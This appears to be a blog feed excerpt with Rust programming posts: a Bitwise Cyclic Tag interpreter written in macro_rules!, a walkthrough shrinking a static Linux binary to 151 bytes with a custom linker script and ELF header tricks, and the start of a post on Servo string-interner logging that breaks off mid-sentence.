tag:blogger.com,1999:blog-1563623855220143059Wed, 25 Feb 2015 07:47:07 +0000codehaskellimadethiscrustdonttrythisathomekernelsecurityslidessystemscxxdebuggingdetrospectorgitlambda-calculuspythontypes6.S184assemblyautotoolsbostonbreakfastcabalclogparsecomposecompscicomputabilityconcordeconcurrencycontinuationscrystalfontzdebug-diffgdbgenericsghcglobal-lockgraphicshackathonhardwarehdis86html5everjspathjvf2010alanguageslatexmacrosmarkdownmitmoshmozillapandocphosphenepi-calculuspngpreprocessorpropaneqoppaquasicrystalrandomrepartssafe-globalsschemeshellshqqsmttarallitracepointstsptype-theoryvau-calculusyices-easymain is usually a functionchar* main = "usually a programming blog";http://mainisusuallyafunction.blogspot.com/noreply@blogger.com (keegan)Blogger52125tag:blogger.com,1999:blog-1563623855220143059.post-8702272289207626556Sat, 21 Feb 2015 01:55:00 +00002015-02-20T17:55:59.852-08:00codeimadethismacrosrustTuring tarpits in Rust's macro system<a href="http://esolangs.org/wiki/Bitwise_Cyclic_Tag">Bitwise Cyclic Tag</a> is an extremely simple automaton slash programming language. BCT uses a program string and a data string, each made of bits. The program string is interpreted as if it were infinite, by looping back around to the first bit.</p> <p>The program consists of commands executed in order. There is a single one-bit command:</p> <blockquote><p><strong>0</strong>: Delete the left-most data bit.</p></blockquote> <p>and a single two-bit command:</p> <blockquote><p><strong>1</strong> <em>x</em>: If the left-most data bit is 1, copy bit <em>x</em> to the right of the data string.</p></blockquote> <p>We halt if ever the data string is empty.</p> <p>Remarkably, this is enough to do <a href="http://esolangs.org/wiki/Turing_tarpit">universal computation</a>. Implementing it in <a href="http://doc.rust-lang.org/book/macros.html">Rust&#39;s macro system</a> gives a proof (probably not the first one) that Rust&#39;s macro system is Turing-complete, aside from the recursion limit imposed by the compiler.</p><pre id='rust-example-rendered' class='rust '><br /><span class='attribute'>#<span class='op'>!</span>[<span class='ident'>feature</span>(<span class='ident'>trace_macros</span>)]</span><br /><br /><span class='macro'>macro_rules</span><span class='macro'>!</span> <span class='ident'>bct</span> {<br /> <span class='comment'>// cmd 0: d ... =&gt; ...</span><br /> (<span class='number'>0</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; ));<br /> (<span class='number'>0</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /><br /> <span class='comment'>// cmd 1p: 1 ... =&gt; 1 ... p</span><br /> (<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='number'>1</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /> (<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; <span class='number'>1</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /><br /> <span class='comment'>// cmd 1p: 0 ... =&gt; 0 ...</span><br /> (<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span>, $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /><br /> <span class='comment'>// halt on empty data string</span><br /> ( $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>),<span class='op'>*</span> ; )<br /> <span class='op'>=&gt;</span> (());<br />}<br /><br /><span class='kw'>fn</span> <span class='ident'>main</span>() {<br /> <span class='macro'>trace_macros</span><span class='macro'>!</span>(<span class='boolval'>true</span>);<br /> <span class='macro'>bct</span><span class='macro'>!</span>(<span class='number'>0</span>, <span class='number'>0</span>, <span class='number'>1</span>, <span class='number'>1</span>, <span class='number'>1</span> ; <span class='number'>1</span>, <span class='number'>0</span>, <span class='number'>1</span>);<br />}<br /></pre> <p>This produces the following compiler output:</p> <pre><code class="language-text">bct! { 0 , 0 , 1 , 1 , 1 ; 1 , 0 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 1 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 1 , 0 , 1 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 1 , 0 , 1 , 0 }<br />bct! { 1 , 1 , 1 , 0 , 0 ; 0 , 1 , 0 }<br />bct! { 1 , 0 , 0 , 1 , 1 ; 0 , 1 , 0 }<br />bct! { 0 , 1 , 1 , 1 , 0 ; 0 , 1 , 0 }<br />...<br />bct.rs:19:13: 19:45 error: recursion limit reached while expanding the macro `bct`<br />bct.rs:19 =&gt; (bct!($($ps),*, 1, $p ; $($ds),*));<br /> ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /></code></pre> <p>You can <a href="http://is.gd/AtL7bG">try it online</a>, as well.</p> <h1 id="notes-about-the-macro" class='section-header'>Notes about the macro</h1><p>I would much rather drop the commas and write</p><pre id='rust-example-rendered' class='rust '><br /><span class='comment'>// cmd 0: d ... =&gt; ...</span><br />(<span class='number'>0</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>));<br /><br /><span class='comment'>// cmd 1p: 1 ... =&gt; 1 ... p</span><br />(<span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='number'>1</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /><br /><span class='comment'>// cmd 1p: 0 ... =&gt; 0 ...</span><br />(<span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>)<span class='op'>*</span> <span class='number'>1</span> <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>));<br /></pre> <p>but this runs into the <a href="https://github.com/rust-lang/rfcs/blob/master/text/0550-macro-future-proofing.md">macro future-proofing rules</a>.</p> <p>If we&#39;re required to have commas, then it&#39;s at least nice to handle them uniformly, e.g.</p><pre id='rust-example-rendered' class='rust '><br /><span class='comment'>// cmd 0: d ... =&gt; ...</span><br />(<span class='number'>0</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>_d</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>)<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>0</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /><br /><span class='comment'>// cmd 1p: 1 ... =&gt; 1 ... p</span><br />(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; <span class='number'>1</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>)<span class='op'>*</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>));<br /><br /><span class='comment'>// cmd 1p: 0 ... =&gt; 0 ...</span><br />(<span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span>:<span class='ident'>tt</span> $(, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>:<span class='ident'>tt</span>)<span class='op'>*</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>:<span class='ident'>tt</span>),<span class='op'>*</span>)<br /> <span class='op'>=&gt;</span> (<span class='macro'>bct</span><span class='macro'>!</span>($(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ps</span>),<span class='op'>*</span>, <span class='number'>1</span>, <span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>p</span> ; $(<span class='macro-nonterminal'>$</span><span class='macro-nonterminal'>ds</span>),<span class='op'>*</span>));<br /></pre> <p>But this too is disallowed. An <code>$x:tt</code> variable cannot be followed by a repetition <code>$(...)*</code>, even though it&#39;s (I believe) harmless. There is an <a href="https://github.com/rust-lang/rfcs/pull/733">open RFC</a> about this issue. For now I have to handle the &quot;one&quot; and &quot;more than one&quot; cases separately, which is annoying.</p> <p>In general, I don&#39;t think <code>macro_rules!</code> is a good language for arbitrary computation. This experiment shows the hassle involved in implementing one of the simplest known &quot;arbitrary computations&quot;. Rather, <code>macro_rules!</code> is good at expressing patterns of code reuse that <em>don&#39;t</em> require elaborate compile-time processing. It does so in a way that&#39;s declarative, hygienic, and high-level.</p> <p>However, there is a big middle ground of non-elaborate, but non-trivial computations. <code>macro_rules!</code> is hardly ideal for that, but <a href="http://doc.rust-lang.org/book/plugins.html#syntax-extensions">procedural macros</a> have problems of their own. Indeed, the <code>bct!</code> macro is an extreme case of a pattern I&#39;ve found useful in the real world. The idea is that every recursive invocation of a macro gives you another opportunity to pattern-match the arguments. Some of <a href="http://kmcallister.github.io/talks/rust/2014-rust-macros/slides.html">html5ever&#39;s macros</a>do this, for example.</p>http://mainisusuallyafunction.blogspot.com/2015/02/turing-tarpits-in-rusts-macro-system.htmlnoreply@blogger.com (keegan)0tag:blogger.com,1999:blog-1563623855220143059.post-4014621755995522389Sun, 11 Jan 2015 02:03:00 +00002015-01-10T18:03:34.676-08:00codeimadethisrust151-byte static Linux binary in Rust<p>Part of the sales pitch for <a href="http://www.rust-lang.org/">Rust</a> is that it&#39;s &quot;as bare metal as C&quot;.<sup id="fnref1"><a href="#fn1" rel="footnote">1</a></sup> Rust can do anything C can do, run anywhere C can run,<sup id="fnref2"><a href="#fn2" rel="footnote">2</a></sup> with code that&#39;s just as efficient, and at least as safe (but usually much safer).</p> <p>I&#39;d say this claim is about 95% true, which is pretty good by the standards of marketing claims. A while back I decided to put it to the test, by making the smallest, most self-contained Rust program possible. After resolving a <a href="https://github.com/rust-lang/rust/pull/17037">few</a><a href="https://github.com/rust-lang/rust/pull/16970">issues</a> along the way, I ended up with a 151-byte, statically linked executable for AMD64 Linux. With the <a href="http://blog.rust-lang.org/2015/01/09/Rust-1.0-alpha.html">release of Rust 1.0-alpha</a>, it&#39;s time to show this off.</p> <p>Here&#39;s the Rust code:</p><pre class='rust '><br /><span class='attribute'>#<span class='op'>!</span>[<span class='ident'>crate_type</span><span class='op'>=</span><span class='string'>&quot;rlib&quot;</span>]</span><br /><span class='attribute'>#<span class='op'>!</span>[<span class='ident'>allow</span>(<span class='ident'>unstable</span>)]</span><br /><br /><span class='attribute'>#[<span class='ident'>macro_use</span>]</span> <span class='kw'>extern</span> <span class='kw'>crate</span> <span class='ident'>syscall</span>;<br /><br /><span class='kw'>use</span> <span class='ident'>std</span>::<span class='ident'>intrinsics</span>;<br /><br /><span class='kw'>fn</span> <span class='ident'>exit</span>(<span class='ident'>n</span>: <span class='ident'>usize</span>) <span class='op'>-&gt;</span> <span class='op'>!</span> {<br /> <span class='kw'>unsafe</span> {<br /> <span class='macro'>syscall</span><span class='macro'>!</span>(<span class='ident'>EXIT</span>, <span class='ident'>n</span>);<br /> <span class='ident'>intrinsics</span>::<span class='ident'>unreachable</span>()<br /> }<br />}<br /><br /><span class='kw'>fn</span> <span class='ident'>write</span>(<span class='ident'>fd</span>: <span class='ident'>usize</span>, <span class='ident'>buf</span>: <span class='kw-2'>&amp;</span>[<span class='ident'>u8</span>]) {<br /> <span class='kw'>unsafe</span> {<br /> <span class='macro'>syscall</span><span class='macro'>!</span>(<span class='ident'>WRITE</span>, <span class='ident'>fd</span>, <span class='ident'>buf</span>.<span class='ident'>as_ptr</span>(), <span class='ident'>buf</span>.<span class='ident'>len</span>());<br /> }<br />}<br /><br /><span class='attribute'>#[<span class='ident'>no_mangle</span>]</span><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>main</span>() {<br /> <span class='ident'>write</span>(<span class='number'>1</span>, <span class='string'>&quot;Hello!\n&quot;</span>.<span class='ident'>as_bytes</span>());<br /> <span class='ident'>exit</span>(<span class='number'>0</span>);<br />}<br /></pre> <p>This uses my <a href="https://crates.io/crates/syscall">syscall library</a>, which provides the <code>syscall!</code> macro. We wrap the underlying system calls with Rust functions, each exposing a safe interface to the <a href="http://doc.rust-lang.org/book/unsafe.html">unsafe</a> <code>syscall!</code> macro. The <code>main</code> function uses these two safe functions and doesn&#39;t need its own <code>unsafe</code>annotation. Even in such a small program, Rust allows us to isolate memory unsafety to a subset of the code.</p> <p>Because of <code>crate_type=&quot;rlib&quot;</code>, rustc will build this as a static library, from which we extract a single object file <code>tinyrust.o</code>:</p> <pre><code class="language-text">$ rustc tinyrust.rs \<br /> -O -C no-stack-check -C relocation-model=static \<br /> -L syscall.rs/target<br />$ ar x libtinyrust.rlib tinyrust.o<br />$ objdump -dr tinyrust.o<br />0000000000000000 &lt;main&gt;:<br /> 0: b8 01 00 00 00 mov $0x1,%eax<br /> 5: bf 01 00 00 00 mov $0x1,%edi<br /> a: be 00 00 00 00 mov $0x0,%esi<br /> b: R_X86_64_32 .rodata.str1625<br /> f: ba 07 00 00 00 mov $0x7,%edx<br /> 14: 0f 05 syscall <br /> 16: b8 3c 00 00 00 mov $0x3c,%eax<br /> 1b: 31 ff xor %edi,%edi<br /> 1d: 0f 05 syscall <br /></code></pre> <p>We disable stack exhaustion checking, as well as position-independent code, in order to slim down the output. After optimization, the only instructions that survive come from <a href="https://github.com/kmcallister/syscall.rs/blob/master/src/platform/linux-x86_64/mod.rs">inline assembly blocks in the syscall library</a>.</p> <p>Note that <code>main</code> doesn&#39;t end in a <code>ret</code> instruction. The <code>exit</code> function (which gets inlined) is marked with a &quot;return type&quot; of <code>!</code>, meaning <a href="http://doc.rust-lang.org/reference.html#diverging-functions">&quot;doesn&#39;t return&quot;</a>. We make good on this by invoking the <a href="http://llvm.org/docs/LangRef.html#unreachable-instruction"><code>unreachable</code>intrinsic</a> after <code>syscall!</code>. <a href="http://llvm.org">LLVM</a> will optimize under the assumption that we can never reach this point, making no guarantees about the program behavior if it is reached. This represents the fact that the kernel is actually going to kill the process before <code>syscall!(EXIT, n)</code> can return.</p> <p>Because we use inline assembly and intrinsics, this code is not going to work on a <a href="http://blog.rust-lang.org/2014/10/30/Stability.html">stable-channel build</a> of Rust 1.0. It will require an alpha or nightly build until such time as inline assembly and <code>intrinsics::unreachable</code> are added to the stable language of Rust 1.x.</p> <p>Note that I didn&#39;t even use <code>#![no_std]</code>! This program is so tiny that everything it pulls from libstd is a type definition, macro, or fully inlined function. As a result there&#39;s nothing of libstd left in the compiler output. In a larger program you may need <code>#![no_std]</code>, although its role is <a href="https://github.com/rust-lang/rust/issues/20537">greatly reduced</a> following the <a href="https://github.com/rust-lang/rust/pull/19654">removal of Rust&#39;s runtime</a>.</p> <h1 id="linking" class='section-header'>Linking</h1><p>This is where things get weird.</p> <p>Whether we compile from C or Rust,<sup id="fnref3"><a href="#fn3" rel="footnote">3</a></sup> the standard linker toolchain is going to include a bunch of junk we don&#39;t need. So I cooked up my own <a href="https://sourceware.org/binutils/docs/ld/Scripts.html">linker script</a>:</p> <pre><code class="language-text">SECTIONS {<br /> . = 0x400078;<br /> <br /> combined . : AT(0x400078) ALIGN(1) SUBALIGN(1) {<br /> *(.text*)<br /> *(.data*)<br /> *(.rodata*)<br /> *(.bss*)<br /> }<br />}<br /></code></pre> <p>We smash all the sections together, with no alignment padding, then extract that section as a headerless binary blob:</p> <pre><code class="language-text">$ ld --gc-sections -e main -T script.ld -o payload tinyrust.o<br />$ objcopy -j combined -O binary payload payload.bin<br /></code></pre> <p>Finally we stick this on the end of a custom ELF header. The header is written in <a href="http://www.nasm.us/">NASM</a> syntax but contains no instructions, only data fields. The base address <code>0x400078</code> seen above is the end of this header, when the whole file is loaded at <code>0x400000</code>. There&#39;s no guarantee that <code>ld</code> will put <code>main</code> at the beginning of the file, so we need to separately determine the address of <code>main</code> and fill that in as the <code>e_entry</code> field in the ELF file header.</p> <pre><code class="language-text">$ ENTRY=$(nm -f posix payload | grep &#39;^main &#39; | awk &#39;{print $3}&#39;)<br />$ nasm -f bin -o tinyrust -D entry=0x$ENTRY elf.s<br />$ chmod +x ./tinyrust<br />$ ./tinyrust<br />Hello!<br /></code></pre> <p>It works! And the size:</p> <pre><code class="language-text">$ wc -c &lt; tinyrust<br />158<br /></code></pre> <p>Seven bytes too big!</p> <h1 id="the-final-trick" class='section-header'>The final trick</h1><p>To get down to 151 bytes, I took inspiration from <a href="http://www.muppetlabs.com/%7Ebreadbox/software/tiny/teensy.html">this classic article</a>, which observes that padding fields in the ELF header can be used to store other data. Like, say, <a href="https://github.com/kmcallister/tiny-rust-demo/blob/97975946aad62625c28d053c2396ee5d2609a90c/elf.s#L11-L12">a string constant</a>. The Rust code changes to access this constant:</p><pre class='rust '><br /><span class='kw'>use</span> <span class='ident'>std</span>::{<span class='ident'>mem</span>, <span class='ident'>raw</span>};<br /><br /><span class='attribute'>#[<span class='ident'>no_mangle</span>]</span><br /><span class='kw'>pub</span> <span class='kw'>fn</span> <span class='ident'>main</span>() {<br /> <span class='kw'>let</span> <span class='ident'>message</span>: <span class='kw-2'>&amp;</span><span class='lifetime'>&#39;static</span> [<span class='ident'>u8</span>] <span class='op'>=</span> <span class='kw'>unsafe</span> {<br /> <span class='ident'>mem</span>::<span class='ident'>transmute</span>(<span class='ident'>raw</span>::<span class='ident'>Slice</span> {<br /> <span class='ident'>data</span>: <span class='number'>0x00400008</span> <span class='kw'>as</span> <span class='op'>*</span><span class='kw'>const</span> <span class='ident'>u8</span>,<br /> <span class='ident'>len</span>: <span class='number'>7</span>,<br /> })<br /> };<br /><br /> <span class='ident'>write</span>(<span class='number'>1</span>, <span class='ident'>message</span>);<br /> <span class='ident'>exit</span>(<span class='number'>0</span>);<br />}<br /></pre> <p>A Rust <a href="http://doc.rust-lang.org/book/arrays-vectors-and-slices.html">slice</a>like <code>&amp;[u8]</code> consists of a pointer to some memory, and a length indicating the number of elements that may be found there. The module <a href="http://doc.rust-lang.org/std/raw/index.html"><code>std::raw</code></a> exposes this as an ordinary struct that we build, then <a href="http://doc.rust-lang.org/std/mem/fn.transmute.html">transmute</a> to the actual slice type. The <code>transmute</code> function generates no code; it just tells the type checker to treat our <code>raw::Slice&lt;u8&gt;</code> as if it were a <code>&amp;[u8]</code>. We return this value out of the <code>unsafe</code> block, taking advantage of the &quot;everything is an expression&quot; syntax, and then print the message as before.</p> <p>Trying out the new version:</p> <pre><code class="language-text">$ rustc tinyrust.rs \<br /> -O -C no-stack-check -C relocation-model=static \<br /> -L syscall.rs/target<br />$ ar x libtinyrust.rlib tinyrust.o<br />$ objdump -dr tinyrust.o<br />0000000000000000 &lt;main&gt;: <br /> 0: b8 01 00 00 00 mov $0x1,%eax<br /> 5: bf 01 00 00 00 mov $0x1,%edi<br /> a: be 08 00 40 00 mov $0x400008,%esi<br /> f: ba 07 00 00 00 mov $0x7,%edx<br /> 14: 0f 05 syscall <br /> 16: b8 3c 00 00 00 mov $0x3c,%eax<br /> 1b: 31 ff xor %edi,%edi<br /> 1d: 0f 05 syscall <br /><br />...<br />$ wc -c &lt; tinyrust<br />151<br />$ ./tinyrust<br />Hello!<br /></code></pre> <p>The object code is the same as before, except that the relocation for the string constant has become an absolute address. The binary is smaller by 7 bytes (the size of <code>&quot;Hello!\n&quot;</code>) and it still works!</p> <p>You can find the full code <a href="https://github.com/kmcallister/tiny-rust-demo">on GitHub</a>. The code in this article works on rustc 1.0.0-dev (44a287e6e 2015-01-08). If I update the code on GitHub, I will also update the version number printed by the included build script.</p> <p>I&#39;d be curious to hear if anyone can make my program smaller!</p> <div class="footnotes"><hr><ol> <li id="fn1"><p>C is not really &quot;bare metal&quot;, but that&#39;s <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">another story</a>.&nbsp;<a href="#fnref1" rev="footnote">&#8617;</a></p></li> <li id="fn2"><p>From a pure language perspective. If you want to talk about availability of compilers and libraries, then Rust still has a <em>bit</em> of a disadvantage ;)&nbsp;<a href="#fnref2" rev="footnote">&#8617;</a></p></li> <li id="fn3"><p>In fact, this code grew out of an earlier experiment with really small binaries in C.&nbsp;<a href="#fnref3" rev="footnote">&#8617;</a></p></li>http://mainisusuallyafunction.blogspot.com/2015/01/151-byte-static-linux-binary-in-rust.htmlnoreply@blogger.com (keegan)10tag:blogger.com,1999:blog-1563623855220143059.post-4097706532839811603Wed, 29 Oct 2014 19:10:00 +00002014-10-29T12:15:27.014-07:00coderustsystemsA taste of Rust (yum) for C/C++ programmers<p>If, like me, you&#39;ve been frustrated with the status quo in systems languages, this article will give you a taste of why Rust is so exciting. In a tiny amount of code, it shows a lot of ways that Rust really kicks ass compared to C and C++. It&#39;s not just safe and fast, it&#39;s a lot more convenient.</p> <p>Web browsers do <a href="http://en.wikipedia.org/wiki/String_interning">string interning</a>to condense the strings that make up the Web, such as tag and attribute names, into small values that can be compared quickly. I recently added event logging support to <a href="https://github.com/servo/servo">Servo</a>&#39;s string interner. This will allow us to record traces from real websites, which we can use to guide further optimizations.</p> <p>Here are the events we can log:</p><pre class='rust '><br /><span class='attribute'>#[<span class='ident'>deriving</span>(<span class='ident'>Show</span>)]</span><br /><span class='kw'>pub</span> <span class='kw'>enum</span> <span class='ident'>Event</span> {<br /> <span class='ident'>Intern</span>(<span class='ident'>u64</span>),<br /> <span class='ident'>Insert</span>(<span class='ident'>u64</span>, <span class='ident'>String</span>),<br /> <span class='ident'>Remove</span>(<span class='ident'>u64</span>),<br />}<br /></pre> <p>Interned strings have a 64-bit ID, which is recorded in every event. The <a href="http://doc.rust-lang.org/std/string/struct.String.html"><code>String</code></a>we store for &quot;insert&quot; events is like C++&#39;s <code>std::string</code>; it points to a buffer in the heap, and it owns that buffer.</p> <p>This <a href="http://doc.rust-lang.org/guide.html#enums"><code>enum</code></a> is a bit fancier than a C <code>enum</code>, but its representation in memory is no more complex than a C <code>struct</code>. There&#39;s a tag for the three alternatives, a 64-bit ID, and a few fields that make up the <code>String</code>. When we pass or return an <code>Event</code> by value, it&#39;s at worst a <code>memcpy</code>of a few dozen bytes. There&#39;s no implicit heap allocation, garbage collection, or anything like that. We didn&#39;t define a way to copy an event; this means the <code>String</code> buffer always has a unique owner who is responsible for freeing it.</p> <p>The <code>deriving(Show)</code> attribute tells the compiler to <a href="http://doc.rust-lang.org/reference.html#deriving">auto-generate</a>a text representation, so we can print an <code>Event</code>just as easily as a built-in type.</p> <p>Next we declare a global vector of events, protected by a mutex:</p><pre class='rust '><br /><span class='macro'>lazy_static</span><span class='macro'>!</span> {<br /> <span class='kw'>pub</span> <span class='kw'>static</span> <span class='kw-2'>ref</span> <span class='ident'>LOG</span>: <span class='ident'>Mutex</span><span class='op'>&lt;</span><span class='ident'>Vec</span><span class='op'>&lt;</span><span class='ident'>Event</span><span class='op'>&gt;&gt;</span><br /> <span class='op'>=</span> <span class='ident'>Mutex</span>::<span class='ident'>new</span>(<span class='ident'>Vec</span>::<span class='ident'>with_capacity</span>(<span class='number'>50_000</span>));<br />}<br /></pre> <p><code>lazy_static!</code> will initialize both of them when <code>LOG</code> is first used. Like <code>String</code>, the <code>Vec</code> is a growable buffer. We won&#39;t turn on event logging in release builds, so it&#39;s fine to pre-allocate space for 50,000 events. (You can put underscores anywhere in a integer literal to improve readability.)</p> <p><code>lazy_static!</code>, <code>Mutex</code>, and <code>Vec</code> are all implemented in Rust using gnarly low-level code. But the amazing thing is that all three expose a safe interface. It&#39;s simply not possible to use the variable before it&#39;s initialized, or to read the value the <code>Mutex</code> protects without locking it, or to modify the vector while iterating over it.</p> <p>The worst you can do is deadlock. And Rust considers that pretty bad, still, which is why it discourages global state. But it&#39;s clearly what we need here. Rust takes a pragmatic approach to safety. You can always write <a href="http://doc.rust-lang.org/reference.html#unsafety">the <code>unsafe</code> keyword</a>and then use the same pointer tricks you&#39;d use in C. But you don&#39;t need to be quite so guarded when writing the other 95% of your code. I want a language that assumes I&#39;m brilliant but 